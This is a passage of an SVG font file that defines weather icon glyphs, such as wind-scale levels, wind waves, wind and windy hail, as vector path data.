13-31 1l-2-2c-31-32-63-35-99-9-3 2-6 4-9 6-12 11-18 11-30 0-15-14-31-24-53-24-11 1-19-6-19-16 0-10 8-17 20-17 22 0 42 8 59 21 6 5 10 5 17 1 43-30 83-29 125 3 5 4 7 3 12 0 38-33 90-33 128-2 5 3 7 4 11 0 17-15 38-22 58-23 10-1 17 2 21 10 3 6 2 12-2 17-4 5-10 6-16 7z" />
<glyph glyph-name="wind-scale-11" horiz-adv-x="1000" unicode="&#xee8d;" d="M712 311h48v240h-72v-48h24v-192z m84 0h48v240h-72v-48h24v-192z m137-86c-4 6-9 8-16 8-22 1-40 10-53 29-7 11-20 11-28-1-16-22-37-31-63-27-18 2-34 8-42 25-8 16-18 18-31 6-12-11-25-20-41-23-26-6-43 6-47 33-1 7 0 14 0 21 2 12-8 19-19 15-4-1-8-4-11-7-8-6-15-13-23-19-27-22-58-31-92-24-64 14-114 77-115 144-1 41 21 85 54 109 41 31 99 21 128-21 19-26 15-60-9-81-19-18-59-15-76 4-7 8-8 19-2 27 5 8 13 11 24 7 2-1 3-1 5-2 8-2 15 1 18 8 3 7 0 15-7 19-13 6-26 8-40 3-19-6-30-20-33-39-3-22 5-40 23-51 47-31 109-25 134 40 17 46 2 86-30 120-40 42-89 49-142 37-60-14-106-49-143-97-30-41-50-87-66-134-7-22-15-44-29-63-21-29-41-59-83-59-10 0-17-9-17-16 1-8 8-14 18-16 2-1 4-1 6-1 23 0 43 8 61 22 5 5 8 4 14 1 44-31 83-30 127 3 4 3 6 3 10 0 40-32 87-34 129-6 5 4 7 2 11-1 39-26 90-25 127 3 6 4 9 4 15 0 43-30 84-29 125 3 6 4 8 3 12 0 41-33 89-33 130-1 4 4 6 2 10-1 18-15 39-22 63-23 7 0 12 3 15 9 4 6 3 12-1 17z m-155-79c-21 0-38 9-51 27-9 14-21 13-31-1-12-17-29-26-51-27-23 0-42 10-57 28-11 12-20 13-31 1l-2-2c-31-32-63-35-99-9-3 2-6 4-9 6-12 11-18 11-30 0-15-14-31-24-53-24-11 1-19-6-19-16 0-10 8-17 20-17 22 0 42 8 59 21 6 5 10 5 17 1 43-30 83-29 125 3 5 4 8 3 12 0 39-33 90-33 129-2 4 3 6 4 10 0 18-15 38-22 58-23 10-1 17 2 21 10 4 6 2 12-2 17-4 5-10 6-16 7z" />
<glyph glyph-name="wind-scale-12" horiz-adv-x="1000" unicode="&#xee8e;" d="M676 311h48v240h-72v-48h24v-192z m223 48h-114v24c0 3 1 6 2 9s3 6 5 8c3 2 5 4 8 5 3 1 6 2 9 2h25c10 0 19 2 28 6 8 3 16 9 22 15 7 7 12 14 16 23 4 9 6 18 6 28 0 10-2 20-6 28-4 9-9 17-16 23-6 7-14 12-22 16-9 4-19 5-28 5h-86v-48h86c3 0 6 0 9-1s5-3 8-5c2-3 3-5 5-8 1-3 1-6 1-9 0-4 0-7-1-10-2-3-3-5-5-8-3-2-5-4-8-5s-6-2-9-2h-25c-10 0-19-1-28-5-8-4-16-9-23-16-6-6-11-14-15-23-4-8-6-18-6-28v-72h162v48z m34-134c-4 6-9 8-16 8-22 1-40 10-53 29-7 11-20 11-28-1-16-22-37-31-63-27-18 2-34 8-42 25-8 16-18 18-31 6-12-11-25-20-41-23-26-6-43 6-47 33-1 7 0 14 0 21 2 12-8 19-19 15-4-1-8-4-11-7-8-6-15-13-23-19-27-22-58-31-92-24-64 14-114 77-115 144-1 41 21 85 54 109 41 31 99 21 128-21 19-26 15-60-9-81-19-18-59-15-76 4-7 8-8 19-2 27 5 8 13 11 24 7 2-1 3-1 5-2 8-2 15 1 18 8 3 7 0 15-7 19-13 6-26 8-40 3-19-6-30-20-33-39-3-22 5-40 23-51 47-31 109-25 134 40 17 46 2 86-30 120-40 42-89 49-142 37-60-14-106-49-143-97-30-41-50-87-66-134-7-22-15-44-29-63-21-29-41-59-83-59-10 0-17-9-17-16 1-8 8-14 18-16 2-1 4-1 6-1 23 0 43 8 61 22 5 5 8 4 14 1 44-31 83-30 127 3 4 3 6 3 10 0 40-32 87-34 129-6 5 4 7 2 11-1 39-26 90-25 127 3 6 4 9 4 15 0 43-30 84-29 125 3 6 4 8 3 12 0 41-33 89-33 130-1 4 4 6 2 10-1 18-15 39-22 63-23 7 0 12 3 15 9 4 6 3 12-1 17z m-155-79c-21 0-38 9-51 27-9 14-21 13-31-1-12-17-29-26-51-27-23 0-42 10-57 28-11 12-20 13-31 1l-2-2c-31-32-63-35-99-9-3 2-6 4-9 6-12 11-18 11-30 0-15-14-31-24-53-24-11 1-19-6-19-16 0-10 8-17 20-17 22 0 42 8 59 21 6 5 10 5 17 1 43-30 83-29 125 3 5 4 7 3 12 0 38-33 90-33 128-2 5 3 7 4 11 0 17-15 38-22 58-23 10-1 17 2 21 10 3 6 2 12-2 17-4 5-10 6-16 7z" />
<glyph glyph-name="wind-scale-2" horiz-adv-x="1000" unicode="&#xee8f;" d="M851 355h-114v24c0 3 1 6 2 9s3 6 5 8c3 2 5 4 8 5s6 2 9 2h25c10 0 19 2 28 6 8 3 16 9 22 15s12 14 16 23 6 18 6 28c0 10-2 20-6 28-4 9-9 17-16 23-6 7-14 12-22 16s-19 5-28 5h-86v-48h86c3 0 6 0 9-2s5-3 8-5c2-2 3-4 5-7 1-3 1-6 1-10 0-3 0-6-1-9-2-3-3-6-5-8-3-2-5-4-8-5s-6-2-9-2h-25c-10 0-19-2-28-5-8-4-16-9-23-16-6-6-11-14-15-23-4-9-6-18-6-28v-72h162v48z m83-131c-4 6-9 8-16 8-22 1-40 10-53 29-7 11-20 11-28-1-16-22-37-31-63-27-18 2-34 8-42 25-8 16-18 18-31 6-12-11-25-20-41-23-26-6-43 6-47 33-1 7 0 14 0 21 2 12-8 19-19 15-4-1-8-4-11-7-8-6-15-13-23-19-27-22-58-31-92-24-64 14-114 77-115 144-1 41 21 85 54 109 41 31 99 21 128-21 19-26 15-60-9-81-19-18-59-15-76 4-7 8-8 19-2 27 5 8 13 11 24 7 2-1 3-1 5-2 8-2 15 1 18 8 3 7 0 15-7 19-13 6-26 8-40 3-19-6-30-20-33-39-3-22 5-40 23-51 47-31 109-25 134 40 17 46 2 86-30 120-40 42-89 49-142 37-60-14-106-49-143-97-30-41-50-87-66-134-7-22-15-44-29-63-21-29-41-59-83-59-10 0-17-9-17-16 1-8 8-14 18-16 2-1 4-1 6-1 23 0 43 8 61 22 5 5 8 4 14 1 44-31 83-30 127 3 4 3 6 3 10 0 40-32 87-34 129-6 5 4 7 2 11-1 39-26 90-25 127 3 6 4 9 4 15 0 43-30 84-29 125 3 6 4 8 3 12 0 41-33 89-33 130-1 4 4 6 2 10-1 18-15 39-22 63-23 7 0 12 3 15 9 4 6 3 12-1 17z m-155-79c-21 0-38 9-51 27-9 14-21 13-31-1-12-17-29-26-51-27-23 0-42 10-57 28-11 12-20 13-31 1l-2-2c-31-32-63-35-99-9-3 2-6 4-9 6-12 11-18 11-30 0-15-14-31-24-53-24-11 1-19-6-19-16 0-10 8-17 20-17 22 0 42 8 59 21 6 5 10 5 17 1 43-30 83-29 125 3 5 4 7 3 12 0 38-33 90-33 128-2 5 3 7 4 11 0 17-15 38-22 58-23 10-1 17 2 21 10 3 6 2 12-2 17-4 5-10 6-16 7z" />
<glyph glyph-name="wind-scale-3" horiz-adv-x="1000" unicode="&#xee90;" d="M813 315c9 4 16 9 23 16 6 6 12 14 15 23 4 9 6 18 6 28 0 9-2 17-5 26-3 8-8 15-14 22 6 7 11 14 14 22s5 17 5 26c0 10-2 19-6 28-3 9-9 17-15 23-7 7-14 12-23 16-9 3-18 5-28 5h-96v-48h96c3 0 6 0 9-2s6-3 8-5c2-2 4-4 5-7 1-3 2-6 2-10 0-3-1-6-2-9-1-3-3-6-5-8-2-2-5-4-8-5s-6-2-9-2h-66v-48h66c3 0 6-1 9-2s6-3 8-5c2-2 4-5 5-8s2-6 2-9c0-3-1-6-2-9-1-3-3-6-5-8-2-2-5-4-8-5s-6-2-9-2h-96v-48h96c10 0 19 2 28 5z m121-91c-4 6-9 8-16 8-22 1-40 10-53 29-7 11-20 11-28-1-16-22-37-31-63-27-18 2-34 8-42 25-8 16-18 18-31 6-12-11-25-20-41-23-26-6-43 6-47 33-1 7 0 14 0 21 2 12-8 19-19 15-4-1-8-4-11-7-8-6-15-13-23-19-27-22-58-31-92-24-64 14-114 77-115 144-1 41 21 85 54 109 41 31 99 21 128-21 19-26 15-60-9-81-19-18-59-15-76 4-7 8-8 19-2 27 5 8 13 11 24 7 2-1 3-1 5-2 8-2 15 1 18 8 3 7 0 15-7 19-13 6-26 8-40 3-19-6-30-20-33-39-3-22 5-40 23-51 47-31 109-25 134 40 17 46 2 86-30 120-40 42-89 49-142 37-60-14-106-49-143-97-30-41-50-87-66-134-7-22-15-44-29-63-21-29-41-59-83-59-10 0-17-9-17-16 1-8 8-14 18-16 2-1 4-1 6-1 23 0 43 8 61 22 5 5 8 4 14 1 44-31 83-30 127 3 4 3 6 3 10 0 40-32 87-34 129-6 5 4 7 2 11-1 39-26 90-25 127 3 6 4 9 4 15 0 43-30 84-29 125 3 6 4 8 3 12 0 41-33 89-33 130-1 4 4 6 2 10-1 18-15 39-22 63-23 7 0 12 3 15 9 4 6 3 12-1 17z m-155-79c-21 0-38 9-51 27-9 14-21 13-31-1-12-17-29-26-51-27-23 0-42 10-57 28-11 12-20 13-31 1l-2-2c-31-32-63-35-99-9-3 2-6 4-9 6-12 11-18 11-30 0-15-14-31-24-53-24-11 1-19-6-19-16 0-10 8-17 20-17 22 0 42 8 59 21 6 5 10 5 17 1 43-30 83-29 125 3 5 4 7 3 12 0 38-33 90-33 128-2 5 3 7 4 11 0 17-15 38-22 58-23 10-1 17 2 21 10 3 6 2 12-2 17-4 5-10 6-16 7z" />
<glyph glyph-name="wind-scale-4" horiz-adv-x="1000" unicode="&#xee91;" d="M794 307h49v48h24v48h-24v120h-49v-120h-66l21 145h-48l-27-193h120v-48z m140-83c-4 6-9 8-16 8-22 1-40 10-53 29-7 11-20 11-28-1-16-22-37-31-63-27-18 2-34 8-42 25-8 16-18 18-31 6-12-11-25-20-41-23-26-6-43 6-47 33-1 7 0 14 0 21 2 12-8 19-19 15-4-1-8-4-11-7-8-6-15-13-23-19-27-22-58-31-92-24-64 14-114 77-115 144-1 41 21 85 54 109 41 31 99 21 128-21 19-26 15-60-9-81-19-18-59-15-76 4-7 8-8 19-2 27 5 8 13 11 24 7 2-1 3-1 5-2 8-2 15 1 18 8 3 7 0 15-7 19-13 6-26 8-40 3-19-6-30-20-33-39-3-22 5-40 23-51 47-31 109-25 134 40 17 46 2 86-30 120-40 42-89 49-142 37-60-14-106-49-143-97-30-41-50-87-66-134-7-22-15-44-29-63-21-29-41-59-83-59-10 0-17-9-17-16 1-8 8-14 18-16 2-1 4-1 6-1 23 0 43 8 61 22 5 5 8 4 14 1 44-31 83-30 127 3 4 3 6 3 10 0 40-32 87-34 129-6 5 4 7 2 11-1 39-26 90-25 127 3 6 4 9 4 15 0 43-30 84-29 125 3 6 4 8 3 12 0 41-33 89-33 130-1 4 4 6 2 10-1 18-15 39-22 63-23 7 0 12 3 15 9 4 6 3 12-1 17z m-155-79c-21 0-38 9-51 27-9 14-21 13-31-1-12-17-29-26-51-27-23 0-42 10-57 28-11 12-20 13-31 1l-2-2c-31-32-63-35-99-9-3 2-6 4-9 6-12 11-18 11-30 0-15-14-31-24-53-24-11 1-19-6-19-16 0-10 8-17 20-17 22 0 42 8 59 21 6 5 10 5 17 1 43-30 83-29 125 3 5 4 7 3 12 0 38-33 90-33 128-2 5 3 7 4 11 0 17-15 38-22 58-23 10-1 17 2 21 10 3 6 2 12-2 17-4 5-10 6-16 7z" />
<glyph glyph-name="wind-scale-5" horiz-adv-x="1000" unicode="&#xee92;" d="M814 312c9 3 18 8 24 15 7 6 13 14 17 24 4 9 6 20 6 32 0 11-2 22-6 31-4 9-10 17-17 24-6 6-15 11-24 15-9 3-18 5-28 5h-44l4 41h105v49h-148l-14-138h97c3 0 6-1 9-2 4-1 7-3 9-5 3-2 5-5 7-9 1-3 2-7 2-11 0-5-1-9-2-13s-4-6-7-9c-2-2-5-3-9-4-3-1-6-2-9-2h-97v-48h97c10 0 19 1 28 5z m120-88c-4 6-9 8-16 8-22 1-40 10-53 29-7 11-20 11-28-1-16-22-37-31-63-27-18 2-34 8-42 25-8 16-18 18-31 6-12-11-25-20-41-23-26-6-43 6-47 33-1 7 0 14 0 21 2 12-8 19-19 15-4-1-8-4-11-7-8-6-15-13-23-19-27-22-58-31-92-24-64 14-114 77-115 144-1 41 21 85 54 109 41 31 99 21 128-21 19-26 15-60-9-81-19-18-59-15-76 4-7 8-8 19-2 27 5 8 13 11 24 7 2-1 3-1 5-2 8-2 15 1 18 8 3 7 0 15-7 19-13 6-26 8-40 3-19-6-30-20-33-39-3-22 5-40 23-51 47-31 109-25 134 40 17 46 2 86-30 120-40 42-89 49-142 37-60-14-106-49-143-97-30-41-50-87-66-134-7-22-15-44-29-63-21-29-41-59-83-59-10 0-17-9-17-16 1-8 8-14 18-16 2-1 4-1 6-1 23 0 43 8 61 22 5 5 8 4 14 1 44-31 83-30 127 3 4 3 6 3 10 0 40-32 87-34 129-6 5 4 7 2 11-1 39-26 90-25 127 3 6 4 9 4 15 0 43-30 84-29 125 3 6 4 8 3 12 0 41-33 89-33 130-1 4 4 6 2 10-1 18-15 39-22 63-23 7 0 12 3 15 9 4 6 3 12-1 17z m-155-79c-21 0-38 9-51 27-9 14-21 13-31-1-12-17-29-26-51-27-23 0-42 10-57 28-11 12-20 13-31 1l-2-2c-31-32-63-35-99-9-3 2-6 4-9 6-12 11-18 11-30 0-15-14-31-24-53-24-11 1-19-6-19-16 0-10 8-17 20-17 22 0 42 8 59 21 6 5 10 5 17 1 43-30 83-29 125 3 5 4 7 3 12 0 38-33 90-33 128-2 5 3 7 4 11 0 17-15 38-22 58-23 10-1 17 2 21 10 3 6 2 12-2 17-4 5-10 6-16 7z" />
<glyph glyph-name="wind-scale-6" horiz-adv-x="1000" unicode="&#xee93;" d="M708 338c8-8 18-15 30-20 11-5 24-8 37-8 13 0 25 3 36 8 12 5 21 12 29 20 9 9 15 19 20 31 4 11 7 23 7 36 0 14-2 26-7 37-4 11-10 21-17 29s-17 15-28 19c-11 5-23 7-37 7-6 0-11-1-17-3s-11-6-16-9c4 8 8 15 13 22 5 6 11 13 16 19 6 6 12 12 19 17 6 6 13 11 19 15h-65c-10-8-20-18-28-29-9-11-16-23-22-36-5-14-10-27-13-42-3-15-4-30-4-45 0-13 2-26 7-37 5-12 12-22 21-31z m27 85c2 6 4 11 8 15 4 5 9 8 14 10 5 3 11 4 18 4s12-1 18-4c5-2 10-5 13-10 4-4 7-9 9-15s3-11 3-18-1-12-3-18c-2-6-5-11-9-15-3-4-8-8-13-10-6-3-12-4-18-4-7 0-13 1-18 4-5 3-10 6-14 10-3 5-6 10-8 16-2 5-3 11-3 17-1 7 1 13 3 18z m199-199c-4 6-9 8-16 8-22 1-40 10-53 29-7 11-20 11-28-1-16-22-37-31-63-27-18 2-34 8-42 25-8 16-18 18-31 6-12-11-25-20-41-23-26-6-43 6-47 33-1 7 0 14 0 21 2 12-8 19-19 15-4-1-8-4-11-7-8-6-15-13-23-19-27-22-58-31-92-24-64 14-114 77-115 144-1 41 21 85 54 109 41 31 99 21 128-21 19-26 15-60-9-81-19-18-59-15-76 4-7 8-8 19-2 27 5 8 13 11 24 7 2-1 3-1 5-2 8-2 15 1 18 8 3 7 0 15-7 19-13 6-26 8-40 3-19-6-30-20-33-39-3-22 5-40 23-51 47-31 109-25 134 40 17 46 2 86-30 120-40 42-89 49-142 37-60-14-106-49-143-97-30-41-50-87-66-134-7-22-15-44-29-63-21-29-41-59-83-59-10 0-17-9-17-16 1-8 8-14 18-16 2-1 4-1 6-1 23 0 43 8 61 22 5 5 8 4 14 1 44-31 83-30 127 3 4 3 6 3 10 0 40-32 87-34 129-6 5 4 7 2 11-1 39-26 90-25 127 3 6 4 9 4 15 0 43-30 84-29 125 3 6 4 8 3 12 0 41-33 89-33 130-1 4 4 6 2 10-1 18-15 39-22 63-23 7 0 12 3 15 9 4 6 3 12-1 17z m-155-79c-21 0-38 9-51 27-9 14-21 13-31-1-12-17-29-26-51-27-23 0-42 10-57 28-11 12-20 13-31 1l-2-2c-31-32-63-35-99-9-3 2-6 4-9 6-12 11-18 11-30 0-15-14-31-24-53-24-11 1-19-6-19-16 0-10 8-17 20-17 22 0 42 8 59 21 6 5 10 5 17 1 43-30 83-29 125 3 5 4 7 3 12 0 38-33 90-33 128-2 5 3 7 4 11 0 17-15 38-22 58-23 10-1 17 2 21 10 3 6 2 12-2 17-4 5-10 6-16 7z" />
<glyph glyph-name="wind-scale-7" horiz-adv-x="1000" unicode="&#xee94;" d="M727 310h51l83 240h-169v-48h103l-68-192z m207-86c-4 6-9 8-16 8-22 1-40 10-53 29-7 11-20 11-28-1-16-22-37-31-63-27-18 2-34 8-42 25-8 16-18 18-31 6-12-11-25-20-41-23-26-6-43 6-47 33-1 7 0 14 0 21 2 12-8 19-19 15-4-1-8-4-11-7-8-6-15-13-23-19-27-22-58-31-92-24-64 14-114 77-115 144-1 41 21 85 54 109 41 31 99 21 128-21 19-26 15-60-9-81-19-18-59-15-76 4-7 8-8 19-2 27 5 8 13 11 24 7 2-1 3-1 5-2 8-2 15 1 18 8 3 7 0 15-7 19-13 6-26 8-40 3-19-6-30-20-33-39-3-22 5-40 23-51 47-31 109-25 134 40 17 46 2 86-30 120-40 42-89 49-142 37-60-14-106-49-143-97-30-41-50-87-66-134-7-22-15-44-29-63-21-29-41-59-83-59-10 0-17-9-17-16 1-8 8-14 18-16 2-1 4-1 6-1 23 0 43 8 61 22 5 5 8 4 14 1 44-31 83-30 127 3 4 3 6 3 10 0 40-32 87-34 129-6 5 4 7 2 11-1 39-26 90-25 127 3 6 4 9 4 15 0 43-30 84-29 125 3 6 4 8 3 12 0 41-33 89-33 130-1 4 4 6 2 10-1 18-15 39-22 63-23 7 0 12 3 15 9 4 6 3 12-1 17z m-155-79c-21 0-38 9-51 27-9 14-21 13-31-1-12-17-29-26-51-27-23 0-42 10-57 28-11 12-20 13-31 1l-2-2c-31-32-63-35-99-9-3 2-6 4-9 6-12 11-18 11-30 0-15-14-31-24-53-24-11 1-19-6-19-16 0-10 8-17 20-17 22 0 42 8 59 21 6 5 10 5 17 1 43-30 83-29 125 3 5 4 7 3 12 0 38-33 90-33 128-2 5 3 7 4 11 0 17-15 38-22 58-23 10-1 17 2 21 10 3 6 2 12-2 17-4 5-10 6-16 7z" />
<glyph glyph-name="wind-scale-8" horiz-adv-x="1000" unicode="&#xee95;" d="M706 332c9-7 19-12 30-16 11-3 24-5 37-5s25 2 36 5c12 4 22 9 30 16 9 7 16 15 20 24 5 9 8 19 8 30 0 6-1 12-3 18s-4 12-7 17c-3 5-7 10-11 14s-10 8-15 11c3 4 6 7 9 11 3 4 5 8 7 13 2 4 3 8 4 13 1 5 2 9 2 14 0 9-2 18-6 26-4 9-10 16-18 22s-15 11-25 15c-10 3-20 5-31 5-11 0-22-2-31-5-10-4-19-9-26-15-7-6-13-14-17-22-4-8-7-17-7-26 0-5 1-9 2-14 1-4 2-9 4-13 2-5 5-9 8-13 2-4 5-7 9-10-6-3-11-7-15-12s-9-9-12-14c-3-5-5-11-7-17-2-6-3-12-3-18 0-11 3-21 8-30 5-9 12-17 20-24z m37 171c1 3 4 6 7 9 3 2 6 5 10 6 4 1 8 2 13 2 5 0 9-1 13-2s7-4 10-6 6-6 7-9c2-3 3-7 3-11s-1-8-3-11c-1-3-4-6-7-9-3-2-6-4-10-6s-8-2-13-2c-5 0-9 1-13 2-4 2-7 4-10 6s-6 6-7 9c-2 3-3 7-3 11s1 8 3 11z m-13-101c2 5 6 9 10 12s9 7 15 9 11 3 18 3c6 0 12-1 18-3 5-2 10-5 14-9s8-7 10-12c3-4 4-9 4-15s-1-10-4-15c-2-4-5-8-10-11-4-3-9-6-14-8s-12-3-18-3-13 1-18 3c-6 2-11 5-15 8s-8 7-10 11-4 10-4 15c1 6 2 11 4 15z m204-178c-4 6-9 8-16 8-22 1-40 10-53 29-7 11-20 11-28-1-16-22-37-31-63-27-18 2-34 8-42 25-8 16-18 18-31 6-12-11-25-20-41-23-26-6-43 6-47 33-1 7 0 14 0 21 2 12-8 19-19 15-4-1-8-4-11-7-8-6-15-13-23-19-27-22-58-31-92-24-64 14-114 77-115 144-1 41 21 85 54 109 41 31 99 21 128-21 19-26 15-60-9-81-19-18-59-15-76 4-7 8-8 19-2 27 5 8 13 11 24 7 2-1 3-1 5-2 8-2 15 1 18 8 3 7 0 15-7 19-13 6-26 8-40 3-19-6-30-20-33-39-3-22 5-40 23-51 47-31 109-25 134 40 17 46 2 86-30 120-40 42-89 49-142 37-60-14-106-49-143-97-30-41-50-87-66-134-7-22-15-44-29-63-21-29-41-59-83-59-10 0-17-9-17-16 1-8 8-14 18-16 2-1 4-1 6-1 23 0 43 8 61 22 5 5 8 4 14 1 44-31 83-30 127 3 4 3 6 3 10 0 40-32 87-34 129-6 5 4 7 2 11-1 39-26 90-25 127 3 6 4 9 4 15 0 43-30 84-29 125 3 6 4 8 3 12 0 41-33 89-33 130-1 4 4 6 2 10-1 18-15 39-22 63-23 7 0 12 3 15 9 4 6 3 12-1 17z m-155-79c-21 0-38 9-51 27-9 14-21 13-31-1-12-17-29-26-51-27-23 0-42 10-57 28-11 12-20 13-31 1l-2-2c-31-32-63-35-99-9-3 2-6 4-9 6-12 11-18 11-30 0-15-14-31-24-53-24-11 1-19-6-19-16 0-10 8-17 20-17 22 0 42 8 59 21 6 5 10 5 17 1 43-30 83-29 125 3 5 4 7 3 12 0 38-33 90-33 128-2 5 3 7 4 11 0 17-15 38-22 58-23 10-1 17 2 21 10 3 6 2 12-2 17-4 5-10 6-16 7z" />
<glyph glyph-name="wind-scale-9" horiz-adv-x="1000" unicode="&#xee96;" d="M702 396c8-8 17-14 28-19s23-7 37-7c6 0 11 2 17 4s11 5 16 8c-4-7-8-14-13-21-5-7-10-13-16-20-6-6-12-11-18-17-7-5-13-10-20-14h65c10 8 20 17 28 29s16 23 22 36c5 13 10 27 13 42 3 14 4 29 4 45 0 13-2 25-7 37s-12 21-20 30c-9 9-19 15-31 21-11 5-24 7-37 7-13 0-25-2-36-7-11-6-21-12-29-21-8-9-15-19-20-30-4-12-7-24-7-37 0-14 2-26 6-37 5-11 11-21 18-29z m28 84c2 6 5 11 9 15 4 5 8 8 13 10 6 3 12 4 18 4 7 0 13-1 18-4 5-2 10-6 14-10 4-4 7-9 9-15 2-6 3-12 3-18 0-6-1-12-3-18-2-6-5-11-9-15-4-4-8-7-14-10s-11-4-18-4-12 2-18 4-9 6-13 10c-4 4-7 9-9 15-2 6-3 12-3 18 0 6 1 13 3 18z m204-256c-4 6-9 8-16 8-22 1-40 10-53 29-7 11-20 11-28-1-16-22-37-31-63-27-18 2-34 8-42 25-8 16-18 18-31 6-12-11-25-20-41-23-26-6-43 6-47 33-1 7 0 14 0 21 2 12-8 19-19 15-4-1-8-4-11-7-8-6-15-13-23-19-27-22-58-31-92-24-64 14-114 77-115 144-1 41 21 85 54 109 41 31 99 21 128-21 19-26 15-60-9-81-19-18-59-15-76 4-7 8-8 19-2 27 5 8 13 11 24 7 2-1 3-1 5-2 8-2 15 1 18 8 3 7 0 15-7 19-13 6-26 8-40 3-19-6-30-20-33-39-3-22 5-40 23-51 47-31 109-25 134 40 17 46 2 86-30 120-40 42-89 49-142 37-60-14-106-49-143-97-30-41-50-87-66-134-7-22-15-44-29-63-21-29-41-59-83-59-10 0-17-9-17-16 1-8 8-14 18-16 2-1 4-1 6-1 23 0 43 8 61 22 5 5 8 4 14 1 44-31 83-30 127 3 4 3 6 3 10 0 40-32 87-34 129-6 5 4 7 2 11-1 39-26 90-25 127 3 6 4 9 4 15 0 43-30 84-29 125 3 6 4 8 3 12 0 41-33 89-33 130-1 4 4 6 2 10-1 18-15 39-22 63-23 7 0 12 3 15 9 4 6 3 12-1 17z m-155-79c-21 0-38 9-51 27-9 14-21 13-31-1-12-17-29-26-51-27-23 0-42 10-57 28-11 12-20 13-31 1l-2-2c-31-32-63-35-99-9-3 2-6 4-9 6-12 11-18 11-30 0-15-14-31-24-53-24-11 1-19-6-19-16 0-10 8-17 20-17 22 0 42 8 59 21 6 5 10 5 17 1 43-30 83-29 125 3 5 4 8 3 12 0 39-33 90-33 129-2 4 3 6 4 10 0 18-15 38-22 58-23 10-1 17 2 21 10 4 6 2 12-2 17-4 5-10 6-16 7z" />
<glyph glyph-name="wind-waves" horiz-adv-x="1000" unicode="&#xee97;" d="M934 224c-4 6-9 8-16 8-22 1-40 10-53 29-7 11-20 11-28-1-16-22-37-31-63-27-18 2-34 8-42 25-8 16-18 18-31 6-12-11-25-20-41-23-26-6-43 6-47 33-1 7 0 14 0 21 2 12-8 19-19 15-4-1-8-4-11-7-8-6-15-13-23-19-27-22-58-31-92-24-64 14-114 77-115 144-1 41 21 85 54 109 41 31 99 21 128-21 19-26 15-60-9-81-19-18-59-15-76 4-7 8-8 19-2 27 5 8 13 11 24 7 2-1 3-1 5-2 8-2 15 1 18 8 3 7 0 15-7 19-13 6-26 8-40 3-19-6-30-20-33-39-3-22 5-40 23-51 47-31 109-25 134 40 17 46 2 86-30 120-40 42-89 49-142 37-60-14-106-49-143-97-30-41-50-87-66-134-7-22-15-44-29-63-21-29-41-59-83-59-10 0-17-9-17-16 1-8 8-14 18-16 2-1 4-1 6-1 23 0 43 8 61 22 5 5 8 4 14 1 44-31 83-30 127 3 4 3 6 3 10 0 40-32 87-34 129-6 5 4 7 2 11-1 39-26 90-25 127 3 6 4 9 4 15 0 43-30 84-29 125 3 6 4 8 3 12 0 41-33 89-33 130-1 4 4 6 2 10-1 18-15 39-22 63-23 7 0 12 3 15 9 4 6 3 12-1 17z m-155-79c-21 0-38 9-51 27-9 14-21 13-31-1-12-17-29-26-51-27-23 0-42 10-57 28-11 12-20 13-31 1l-2-2c-31-32-63-35-99-9-3 2-6 4-9 6-12 11-18 11-30 0-15-14-31-24-53-24-11 1-19-6-19-16 0-10 8-17 20-17 22 0 42 8 59 21 6 5 10 5 17 1 43-30 83-29 125 3 5 4 8 3 12 0 39-33 90-33 129-2 4 3 6 4 10 0 18-15 38-22 58-23 10-1 17 2 21 10 4 6 2 12-2 17-4 5-10 6-16 7z" />
<glyph glyph-name="wind" horiz-adv-x="1000" unicode="&#xee98;" d="M708 357c-14 3-29 3-44 3-148 0-296 1-444 1-28 0-57 0-86 0-12 0-19-7-20-17-1-9 4-18 13-20 4-1 7-1 11-1 92 0 183 0 275 0 89-1 177-1 265-1 56 0 103-45 104-101 1-47-33-82-79-84-38-1-69 38-59 73 5 17 17 27 33 31 16 3 31 0 41-15 6-8 16-9 24-4 9 6 11 16 6 26-8 14-21 23-36 28-45 15-96-14-106-61-10-48 22-99 70-112 2 0 3-1 5-1 9-2 30-4 60 5 8 2 15 6 22 10 40 24 62 71 56 117-9 63-49 107-111 123z m-107 31c47 0 85 17 109 59 35 61 8 129-51 148-48 17-96-9-108-58-2-6-3-14-1-21 1-9 8-15 17-15 10 0 17 6 19 15 1 5 1 10 2 15 8 28 38 40 66 26 26-13 39-42 32-70-11-38-40-61-80-61-173 0-346 0-519 1-11 0-19-4-24-15v-8c4-12 13-15 24-15 94 0 188 0 282 0 77 0 154 0 232-1z m-78-95c-54 0-109 0-163 0v0h-173c-13 0-22-7-22-18 0-12 8-19 22-20 37 0 73 0 109 0 77 0 153 0 229 0 14 0 22-5 23-16 2-10-4-18-14-21-3-1-6-1-9-2-9-3-15-11-14-19 1-10 8-16 17-17 31-3 61 28 58 59-3 35-27 54-63 54z m410 197c-9 27-29 42-56 47-25 5-46-3-62-23-9-11-12-23-13-36 0-11 7-19 17-20 9-1 18 5 20 16 1 4 1 8 3 12 8 19 35 20 50 2 15-18 8-49-14-64-8-5-18-8-28-8h-99c-13 0-22-8-22-19 0-11 9-19 21-19 18 0 36 0 58 0 18 1 39-2 61 2 50 10 81 63 64 110z" />
<glyph glyph-name="windy-hail" horiz-adv-x="1000" unicode="&#xee99;" d="M516 471c-30 30-65 38-105 23-8-2-11-3-14 6-26 65-86 100-155 92-63-7-112-57-124-124 0-4 0-9-5-11-11-5-20-11-27-19v0s-52-50-1-107c1-2 3-4 4-5l1-1 0 0c13-12 29-19 48-21 20-2 41 0 61-1l174 1c26 0 50-1 74 0 42 1 73 22 90 60 16 37 8 80-21 107z m-287-234c0-17-14-31-31-31s-31 14-31 31 14 31 31 31 31-14 31-31z m140-5c0-14-12-26-26-26s-26 12-26 26c0 15 12 26 26 26s26-11 26-26z m-71-68c0-10-9-19-20-19s-20 9-20 19 9 20 20 20c11 0 20-9 20-20z m61-22c0-8-6-15-15-15s-15 7-15 15 7 15 15 15c9 0 15-7 15-15z m-75 83c0-5-4-10-10-10s-10 5-10 10 5 10 10 10c5 0 10-4 10-10z m156 23c0-11-9-20-20-20s-19 9-19 20 9 20 19 20 20-9 20-20z m249 102c-39 0-78 0-117 0l0-1c-8-19-21-34-36-44 52 0 104 0 156 0 55-1 94-44 89-97-4-38-47-66-81-54-28 11-41 44-25 65 13 18 37 19 51 2 8-9 20-11 30-3 9 6 12 19 6 29-15 24-48 37-78 29-59-16-78-82-43-131 16-22 39-33 65-38h25c10 3 20 5 29 9 59 25 84 94 55 155-25 53-68 78-126 79z m-95 125c12-1 23 7 23 20 1 21 17 34 31 35 21 1 41-13 47-32 10-34-17-74-52-77-23-2-45-2-68-1 5-15 7-30 4-45 20 0 39 0 59 0 56 1 106 51 104 107-1 53-38 90-90 93-41 